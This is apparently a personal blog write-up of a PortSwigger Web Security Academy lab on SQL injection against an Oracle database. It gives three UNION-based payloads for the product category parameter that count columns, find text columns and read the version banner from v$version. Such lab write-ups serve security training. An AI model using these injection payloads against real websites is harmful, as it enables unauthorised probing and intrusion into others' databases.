Lab: SQL injection attack, querying the database type and version on Oracle

Posted on 2023-04-25 | Post modified | In Security Practice｜Portswigger Web Security Academy｜SQL |

Lab: SQL injection attack, querying the database type and version on Oracle

tags: `Portswigger Web Security Academy` `Web`

Description: This lab contains a SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
Our Goal: To solve the lab, display the database version string.

Exp - SQLi Cheat Sheet - Examining the database in SQL injection attacks

According to the cheat sheet above, we can use the command to fetch the version of this database, e.g. Before the recon, the hint told you that this database is created by Oracle. So, you must contained From preserved word in each query, e.g. SELECT 'abc' FROM dual

Determine # of columns that are being returned by the query

Payload: ?category=Gifts' union select NULL,NULL from v$version--
Which columns contain text data

Payload: ?category=Gifts' union select 'a','b' from v$version--

Two of them are text data
Attack

Payload: ?category=Gifts' UNION SELECT BANNER,'abc' FROM v$version--

Post author: SBK6401
Post link: https://bernie6401.github.io/Lab-SQL-injection-attack,-querying-the-database-type-and-version-on-Oracle/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.

Lab: SQL injection attack, querying the database type and version on Oracle

tags: Portswigger Web Security Academy Web

Exp - SQLi Cheat Sheet - Examining the database in SQL injection attacks

tags: `Portswigger Web Security Academy` `Web`